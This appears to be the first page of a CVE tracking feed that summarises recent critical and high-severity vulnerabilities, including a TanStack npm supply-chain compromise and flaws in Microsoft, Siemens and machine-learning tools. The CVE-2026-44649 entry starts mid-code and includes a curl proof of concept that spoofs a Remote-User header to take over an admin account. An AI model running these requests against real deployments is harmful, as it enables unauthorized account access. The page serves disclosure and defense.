Skip to main content
CVE-2026-45321 CRITICAL POC KEV PATCH THREAT GHSA MAL Act Now

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actions exploitation. Attackers combined pull_request_target misconfiguration, Actions cache poisoning, and OIDC token memory extraction to publish malicious code under the legitimate TanStack identity. Installing any affected version executes a 2.3 MB obfuscated payload that exfiltrates AWS/GCP/Kubernetes credentials, npm tokens, GitHub secrets, SSH keys, and HashiCorp Vault tokens over encrypted Session/Oxen messenger infrastructure. The payload propagates by republishing victim-maintained packages with identical injection. Socket.dev and the TanStack team confirmed the incident via GHSA-g7cv-rxg3-hmpx. No EPSS or CISA KEV data available for this recent supply-chain attack. CVSS 9.6 reflects the cross-scope credential theft impact (S:C/C:H/I:H), though exploitation requires user-initiated package installation (UI:R).

Kubernetes Node.js Hashicorp Information Disclosure
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.0%
Threat
4.9
CVE-2026-45087 CRITICAL POC PATCH GHSA Act Now

Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).

Denial Of Service Command Injection Authentication Bypass XSS RCE +1
NVD GitHub
CVSS 3.1
10.0
EPSS
0.0%
CVE-2026-41089 CRITICAL POC PATCH NEWS Exploit Unlikely Act Now

Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.

Stack Overflow Microsoft Buffer Overflow
NVD VulDB GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-45185 CRITICAL POC PATCH NEWS Act Now

Exim before 4.99.3, in certain GnuTLS configurations, has a remotely reachable use-after-free in the BDAT body parsing path. It is triggered when a client sends a TLS close_notify mid-body during a CHUNKING transfer, followed by a final cleartext byte on the same TCP connection. This can lead to heap corruption. An unauthenticated network attacker exploiting this vulnerability could execute arbitrary code.

Use After Free Memory Corruption RCE
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-45091 CRITICAL POC PATCH GHSA Act Now

Plaintext TOTP secret exposure in sealed-env enterprise mode allows remote unauthenticated attackers to extract operator authentication credentials from base64-decoded JWS tokens. Versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embed literal TOTP secrets in every minted unseal token's JWS payload without encryption, enabling credential harvesting from CI logs, container environments, monitoring tools, and log aggregators. Fixed in version 0.1.0-alpha.4. CVSS 9.1 (Critical) with network vector and no authentication required. No CISA KEV listing or public exploit code identified at time of analysis, but exploitation requires only base64 decoding of observable tokens.

Information Disclosure Java Node.js
NVD GitHub
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-40370 HIGH POC PATCH Exploit Unlikely This Week

External control of file name or path in SQL Server allows an authorized attacker to execute code over a network.

Information Disclosure Microsoft Sql Server 2016 Service Pack 3 Gdr Microsoft Sql Server 2016 Service Pack 3 Azure Connect Feature Pack Microsoft Sql Server 2017 Cu 31 Microsoft Sql Server 2017 Gdr +6
NVD VulDB GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-42899 HIGH POC PATCH GHSA This Week

Loop with unreachable exit condition ('infinite loop') in ASP.NET Core allows an unauthorized attacker to deny service over a network.

Denial Of Service Net 10 0 Net 8 0 Net 9 0
NVD VulDB GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-43983 HIGH POC PATCH This Week

Pocket ID OIDC provider fails to validate user authorization state during refresh token exchange, allowing revoked, disabled, or unauthorized users to obtain fresh access tokens indefinitely. Affects all versions prior to 2.6.0. Publicly available exploit code exists via GitHub security advisory GHSA-w6p7-2fxx-4f44. Attack requires low privileges and user interaction (CVSS 8.5) but enables persistent unauthorized access even after administrative revocation actions. Fixed in version 2.6.0.

Authentication Bypass Pocket Id
NVD GitHub
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-35433 HIGH POC PATCH GHSA This Week

Improper input validation in .NET allows an unauthorized attacker to elevate privileges locally.

Authentication Bypass Net 10 0 Net 8 0 Net 9 0
NVD VulDB GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-32177 HIGH POC PATCH Exploit Unlikely This Week

Local privilege escalation in Microsoft .NET Framework (versions 3.5 through 10.0) and Visual Studio 2017 occurs through heap-based buffer overflow exploitation requiring user interaction with a malicious file. Attackers without initial privileges can achieve high-level code execution and data access by convincing a user to open a specially crafted document or application. Microsoft has released patches across all affected .NET versions per MSRC advisory, indicating this is a vendor-confirmed issue requiring immediate remediation for systems where users process untrusted .NET content.

Heap Overflow Buffer Overflow Net 10 0 Net 8 0 Net 9 0 +11
NVD VulDB GitHub
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-25787 CRITICAL CISA Emergency

Stored cross-site scripting (XSS) in Siemens SIMATIC S7-1500 and ET 200SP controller families allows authenticated attackers with high privileges to inject malicious scripts via Technology Object (TO) names when downloading TIA Portal projects. The scripts execute when authorized users access the Motion Control Diagnostics web interface page, enabling session hijacking, credential theft, or privileged actions performed under the victim's context. This affects over 100 product variants across industrial automation controllers, software controllers, and open controllers. No active exploitation confirmed (not in CISA KEV). EPSS score not provided in dataset. CVSS 4.0 score of 9.3 reflects high impact across confidentiality, integrity, and availability in both vulnerable and subsequent systems.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf Simatic Et 200Sp Cpu 1510Sp F 1 Pn Simatic Et 200Sp Cpu 1510Sp 1 Pn +95
NVD VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-25786 CRITICAL CISA Emergency

Stored cross-site scripting in Siemens SIMATIC S7-1500 controller family web interface allows authenticated high-privilege attackers to inject malicious code via crafted PLC/station names in TIA project files. When users with appropriate rights later access the communication parameters page, injected scripts execute in their session context with high impact to confidentiality, integrity, and availability across system boundaries (CVSS 9.3, CVSS:4.0 S:H). No public exploit identified at time of analysis, but CVSS vector indicates low attack complexity (AC:L) once attacker gains privileged project upload access.

XSS Simatic Drive Controller Cpu 1504D Tf Simatic Drive Controller Cpu 1507D Tf Simatic Et 200Sp Cpu 1510Sp F 1 Pn Simatic Et 200Sp Cpu 1510Sp 1 Pn +95
NVD VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2025-40949 HIGH CISA Act Now

Command injection in Siemens RUGGEDCOM ROX industrial router series allows high-privileged authenticated remote attackers to execute arbitrary commands with root privileges on the underlying operating system. Affects all MX5000/MX5000RE/RX1400/RX1500/RX1501/RX1510/RX1511/RX1512/RX1524/RX1536/RX5000 models running firmware versions below V2.17.1. The vulnerability exists in the Scheduler functionality of the Web UI due to improper input sanitization (CWE-78). CVSS v4.0 score of 8.9 reflects high impact across confidentiality, integrity, and availability with network attack vector but requires high-privilege authentication. No public exploit identified at time of analysis, and EPSS data not available for this recently published CVE.

Command Injection Ruggedcom Rox Mx5000 Ruggedcom Rox Mx5000Re Ruggedcom Rox Rx1400 Ruggedcom Rox Rx1500 +7
NVD
CVSS 4.0
8.9
EPSS
0.2%
CVE-2026-42898 CRITICAL PATCH NEWS Act Now

Improper control of generation of code ('code injection') in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-42823 CRITICAL PATCH Exploit Unlikely Act Now

Improper access control in Azure Logic Apps allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
9.9
EPSS
0.1%
CVE-2026-41096 CRITICAL PATCH NEWS Act Now

Heap-based buffer overflow in Microsoft Windows DNS allows an unauthorized attacker to execute code over a network.

Heap Overflow Microsoft Buffer Overflow
NVD VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-22924 HIGH CISA Act Now

Remote unauthenticated attackers can exhaust resources and bypass authentication controls in Siemens SIMATIC CN 4100 versions before V5.0, enabling denial of service conditions and unauthorized actions that compromise system availability and integrity. The vulnerability stems from improper connection validation (CWE-306), allowing network-based exploitation without any user interaction or privileges. Siemens has released V5.0 to address this flaw, documented in security advisory SSA-032379.

Authentication Bypass Denial Of Service Simatic Cn 4100
NVD
CVSS 4.0
8.8
EPSS
0.0%
CVE-2026-22925 HIGH CISA Act Now

Siemens SIMATIC CN 4100 versions prior to V5.0 can be rendered unavailable through TCP SYN flood attacks, allowing remote unauthenticated attackers to exhaust system resources and cause complete service disruption. The CVSS 4.0 score of 8.7 reflects the high availability impact (VA:H) combined with network-accessible attack vector requiring no privileges or user interaction. No active exploitation (CISA KEV) or public exploit code has been identified at time of analysis, though SYN flood techniques are well-documented and trivial to execute.

Denial Of Service Simatic Cn 4100
NVD
CVSS 4.0
8.7
EPSS
0.0%
CVE-2025-40833 HIGH CISA Act Now

Denial of service in Siemens industrial networking equipment allows remote unauthenticated attackers to crash affected devices via specially crafted IPv4 packets, requiring manual restart for recovery. This vulnerability affects over 200 Siemens industrial automation products including SCALANCE switches/routers, SIMATIC PLCs, SINAMICS drives, and RUGGEDCOM devices. CVSS 4.0 score of 8.7 reflects high availability impact (VA:H) with network-accessible attack vector requiring low complexity and no privileges (AV:N/AC:L/PR:N). No public exploit code or CISA KEV listing identified at time of analysis, though the straightforward network-based attack and widespread product exposure warrant priority patching for operational technology environments where uptime is critical.

Denial Of Service Null Pointer Dereference Ie Pb Link Ha Ie Pb Link Pn Io Ruggedcom Rm1224 Lte 4G Eu +240
NVD VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-33893 HIGH CISA Act Now

Hardcoded cryptographic keys in Siemens Teamcenter PLM software enable remote attackers to bypass authentication and gain unauthorized access to confidential product lifecycle management data. The vulnerability affects multiple Teamcenter versions (V2312, V2406, V2412, V2506, V2512) and is remotely exploitable without authentication (CVSS:4.0 AV:N/AC:L/PR:N). While no active exploitation or public POC has been identified at time of analysis, the straightforward nature of hardcoded credential extraction (AC:L) combined with the criticality of Teamcenter as an enterprise PLM platform housing intellectual property makes this a high-priority remediation target for manufacturing and engineering organizations.

Authentication Bypass Teamcenter V2312 Teamcenter V2406 Teamcenter V2412 Teamcenter V2506 +1
NVD
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-33862 HIGH CISA Act Now

Stored cross-site scripting (XSS) in Siemens Teamcenter allows authenticated attackers with low privileges to inject malicious JavaScript that executes in other users' browser sessions, enabling session hijacking, credential theft, or unauthorized actions within the product lifecycle management platform. Affects Teamcenter versions V2312 through V2512 with vendor patches released for all branches. CVSS v4.0 scores 8.5 (High) due to network attack vector with low complexity, though exploitation requires user interaction and authenticated access. No public exploit code or CISA KEV listing identified at time of analysis.

XSS Teamcenter V2312 Teamcenter V2406 Teamcenter V2412 Teamcenter V2506 +1
NVD VulDB
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-26289 HIGH CISA Act Now

PowerSYSTEM Center REST API endpoint for device account export allows an authenticated user with limited permissions to expose sensitive information normally restricted to administrative permissions only.

Authentication Bypass Powersystem Center 2020 Powersystem Center 2024 Powersystem Center 2026
NVD GitHub
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-40379 CRITICAL PATCH NEWS NO ACTION HOSTED Monitor

Spoofing vulnerability in Microsoft Azure Entra ID (formerly Azure Active Directory) enables remote unauthenticated attackers to obtain sensitive authentication information via network-based attacks requiring user interaction. The vulnerability affects Microsoft Enterprise Security Token Service (ESTS), the authentication backbone of Azure Entra ID, with scope change indicating potential cross-domain impact. Microsoft has released a patch per MSRC advisory. CVSS 9.3 (Critical) reflects network accessibility, low complexity, and high confidentiality/integrity impact with changed scope.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
9.3
EPSS
0.1%
CVE-2026-40402 CRITICAL PATCH NEWS Exploit Unlikely Act Now

Use after free in Windows Hyper-V allows an unauthorized attacker to elevate privileges locally.

Denial Of Service Microsoft Use After Free Memory Corruption
NVD VulDB
CVSS 3.1
9.3
EPSS
0.0%
CVE-2026-6866 HIGH CISA Act Now

Schneider Electric EcoStruxure Panel Server can revert credentials to insecure default values under rare circumstances, allowing remote unauthenticated attackers to gain unauthorized access using known factory credentials. This CWE-1188 vulnerability enables complete confidential information disclosure (CVSS 8.2 High). Exploitation requires specific timing conditions (AT:P - Attack Timing: Present) to catch the window when credentials reset. EPSS data not available; no CISA KEV listing or public POC identified at time of analysis, suggesting targeted rather than widespread exploitation risk.

Information Disclosure Ecostruxure Panel Server
NVD VulDB
CVSS 4.0
8.2
EPSS
0.1%
CVE-2026-41103 CRITICAL PATCH NEWS Exploit Likely Act Now

Incorrect implementation of authentication algorithm in Microsoft SSO Plugin for Jira & Confluence allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft Atlassian
NVD VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-42833 CRITICAL PATCH Exploit Unlikely Act Now

Execution with unnecessary privileges in Microsoft Dynamics 365 (on-premises) allows an authorized attacker to execute code over a network.

Privilege Escalation Microsoft
NVD VulDB
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-33117 CRITICAL PATCH GHSA Act Now

Authentication bypass in Microsoft Azure SDK for Java allows remote unauthenticated attackers to circumvent security controls over the network without user interaction. The vulnerability exposes confidentiality and integrity of Azure services to unauthorized access, with confirmed vendor patch available. CVSS 9.1 reflects critical network-based exploitation against default configurations, though no active exploitation (CISA KEV) or public POC has been identified at time of analysis.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-42288 CRITICAL Act Now

ChurchCRM is an open-source church management system. Prior to 7.3.2, The fix for CVE-2026-39337 is incomplete. The pre-authentication remote code execution vulnerability in ChurchCRM's setup wizard via unsanitized DB_PASSWORD remains fully exploitable This vulnerability is fixed in 7.3.2.

Code Injection RCE Crm
NVD GitHub
CVSS 3.1
10.0
EPSS
0.3%
CVE-2026-34659 CRITICAL Act Now

Adobe Connect versions 2025.9.15, 2025.8.157 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must visit a maliciously crafted URL or interact with a compromised web page. Scope is changed.

Adobe RCE Deserialization
NVD VulDB
CVSS 3.1
9.6
EPSS
1.5%
CVE-2026-40357 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-33112 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-33110 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-35439 HIGH PATCH Exploit Unlikely This Week

Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Deserialization
NVD VulDB
CVSS 3.1
8.8
EPSS
0.5%
CVE-2026-42854 CRITICAL PATCH Act Now

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, the WebServer multipart form parser in arduino-esp32 allocates a Variable Length Array (VLA) on the stack whose size is derived from an attacker-controlled HTTP header field (Content-Type: multipart/form-data; boundary=...) without enforcing any length limit. Sending a boundary string longer than ~8000 characters overflows the 8192-byte task stack of the loopTask, causing a crash and potential remote code execution. This vulnerability is fixed in 3.3.8.

Stack Overflow RCE Buffer Overflow Arduino Esp32
NVD GitHub
CVSS 3.1
9.8
EPSS
0.2%
CVE-2026-31226 CRITICAL Act Now

Remote code execution in TinyZero's HDFS utilities allows unauthenticated attackers to execute arbitrary OS commands via crafted file paths passed through the Hydra configuration framework. The vulnerability stems from unsanitized user input directly interpolated into os.system() shell commands within the _copy() function, affecting all deployments through commit 6652a63c57fa. No active exploitation confirmed at time of analysis, but EPSS score of 0.14% (33rd percentile) suggests below-average likelihood despite CVSS:9.8 critical rating. The attack requires network access to the TinyZero training process and ability to control path parameters via configuration.

Command Injection RCE
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31234 CRITICAL GHSA Act Now

Remote code execution in Horovod distributed training framework (versions through 0.28.1) allows unauthenticated network attackers to execute arbitrary code on worker nodes by injecting malicious pickle payloads into the KVStore HTTP server. The vulnerability combines unauthenticated write access to the KVStore coordination server with unsafe deserialization using cloudpickle.loads(), enabling trivial exploitation against any reachable Horovod cluster. EPSS score of 0.12% (31st percentile) suggests low widespread exploitation probability despite critical CVSS 9.8 rating, and no active exploitation confirmed (not in CISA KEV). Public exploit development is highly feasible given the straightforward attack path and publicly documented details.

RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-44649 CRITICAL PATCH GHSA Act Now

{ if (!request.session) { return false; } const remoteUser = request.get(header); // reads any header from any client if (!remoteUser) { return false; } const userHandles = await getAllUserHandles(); for (const userHandle of userHandles) { if (remoteUser.toLowerCase() === userHandle) { const user = await storage.getItem(toKey(userHandle)); if (user && user.enabled) { request.session.handle = userHandle; return true; } } } return false; } ``` `request.get(header)` is Express's wrapper for `req.headers[name.toLowerCase()]`. Express does not distinguish between headers set by a trusted upstream proxy and headers injected by the end client. Without an IP allowlist check, any client can set `Remote-User: ` and receive an authenticated session cookie. The `/api/users/list` endpoint is registered before `requireLoginMiddleware` in `src/server-main.js:236`, making it publicly accessible without authentication: `src/server-main.js:236,239`: ```js app.use('/api/users', usersPublicRouter); // line 236 (public) app.use(requireLoginMiddleware); // line 239 (auth gate) ``` `src/endpoints/users-public.js:26-57`: ```js router.post('/list', async (_request, response) => { if (DISCREET_LOGIN) { return response.sendStatus(204); } const users = await storage.values(x => x.key.startsWith(KEY_PREFIX)); return response.json(viewModels); // returns handle, name, avatar, admin, password flags }); ``` This allows an attacker to enumerate all user handles (including admin handles) without any prior credentials. ```bash TARGET="http://localhost:8000" curl -s -X POST "$TARGET/api/users/list" -H "Content-Type: application/json" -d '{}' curl -s -L \ -H "Remote-User: admin-user" \ -c /tmp/st-session.txt \ "$TARGET/login" TOKEN=$(curl -s -b /tmp/st-session.txt "$TARGET/csrf-token" | python3 -c "import sys,json; print(json.load(sys.stdin)['token'])") curl -s -X POST "$TARGET/api/users/admin/get" \ -H "Content-Type: application/json" \ -H "X-CSRF-Token: $TOKEN" \ -b /tmp/st-session.txt \ -d '{}' ``` --- An account takeover, allowing an attacker to do anything a legitimately authorized user can do.

Authentication Bypass CSRF
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-41109 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of special elements in output used by a downstream component ('injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to bypass a security feature over a network.

Authentication Bypass Visual Studio Code
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-41094 HIGH PATCH Exploit Unlikely This Week

Improper control of generation of code ('code injection') in Microsoft Data Formulator allows an unauthorized attacker to execute code over a network.

Microsoft Code Injection RCE
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31214 CRITICAL Act Now

Arbitrary code execution via torch-checkpoint-shrink.py script in ml-engineering project allows remote attackers to execute malicious Python code by providing crafted PyTorch checkpoint files. The vulnerability stems from insecure deserialization where torch.load() processes .pt files without the weights_only=True safeguard, enabling pickle-based arbitrary object instantiation. Despite a critical CVSS 9.8 score, EPSS probability is low (0.06%, 19th percentile) and no public exploit or active exploitation is confirmed, suggesting limited real-world targeting to date. SSVC assessment indicates total technical impact with automatable exploitation potential, making this a priority for organizations using ml-engineering scripts in production environments.

Checkpoint Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31237 CRITICAL GHSA Act Now

Arbitrary code execution in Ludwig framework ≤0.10.4 occurs when attackers supply malicious pickle files to the predict() method, which deserializes untrusted data without validation using pandas.read_pickle(). Remote unauthenticated attackers can achieve full system compromise by exploiting the automatic file format detection mechanism that processes .pkl files through Python's unsafe pickle module. EPSS score of 0.06% (19th percentile) suggests low current exploitation likelihood despite the critical CVSS 9.8 rating, though no public exploit code or active exploitation has been identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31229 CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) through version 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code by uploading malicious PyTorch model files to pipeline-accessible object storage locations. The vulnerability stems from unsafe use of torch.load() without the weights_only=True parameter in the Kubeflow component's model loading process, enabling Pickle deserialization of arbitrary objects. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS exploitation probability (19th percentile), this represents a critical-severity issue with low observed real-world targeting, likely due to the specialized nature of ML robustness evaluation deployments. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-41613 HIGH PATCH Exploit Unlikely This Week

Session fixation in Visual Studio Code allows an unauthorized attacker to elevate privileges over a network.

Authentication Bypass Session Fixation
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-31233 CRITICAL GHSA MAL Act Now

Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.

Code Injection RCE N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31231 CRITICAL Act Now

Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.

Python RCE Code Injection N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-31228 CRITICAL Act Now

Remote code execution in Adversarial Robustness Toolbox (ART) versions through 1.20.1 allows unauthenticated network attackers to execute arbitrary Python code via unsafe eval() usage in the Kubeflow robustness evaluation component. The vulnerability accepts unsanitized user input for LossFn and Optimizer parameters in PyTorch model evaluations, enabling complete system compromise. With CVSS 9.8 but only 0.06% EPSS score (18th percentile), this represents a severe theoretical risk that has not yet manifested in widespread exploitation. No public exploit code identified at time of analysis, and the vulnerability requires specific deployment of ART's Kubeflow integration component.

Python Code Injection RCE N A
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-41086 HIGH PATCH Exploit Unlikely This Week

Improper access control in Windows Admin Center allows an authorized attacker to elevate privileges over a network.

Authentication Bypass Microsoft
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-40365 HIGH PATCH NEWS Exploit Unlikely This Week

Insufficient granularity of access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.

Microsoft Information Disclosure
NVD VulDB
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-44277 CRITICAL NEWS Act Now

Critical unauthenticated access control bypass in Fortinet FortiAuthenticator versions 6.5.0-6.5.6, 6.6.0-6.6.8, 8.0.0, and 8.0.2 enables remote code execution without authentication. The CVSS score of 9.8 with AV:N/AC:L/PR:N/UI:N indicates trivial remote exploitation against default configurations. While the vendor advisory (FG-IR-26-128) confirms this vulnerability, the incomplete description placeholder ('<insert attack vector here>') suggests the advisory may contain additional details not yet published in CVE records. No public exploit code or active exploitation confirmed at time of analysis, though the authentication bypass nature and maximum CVSS scores make this a priority patching target for organizations running FortiAuthenticator.

Authentication Bypass Fortinet
NVD VulDB
CVSS 3.1
9.8
EPSS
0.0%
Page 1 of 11 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy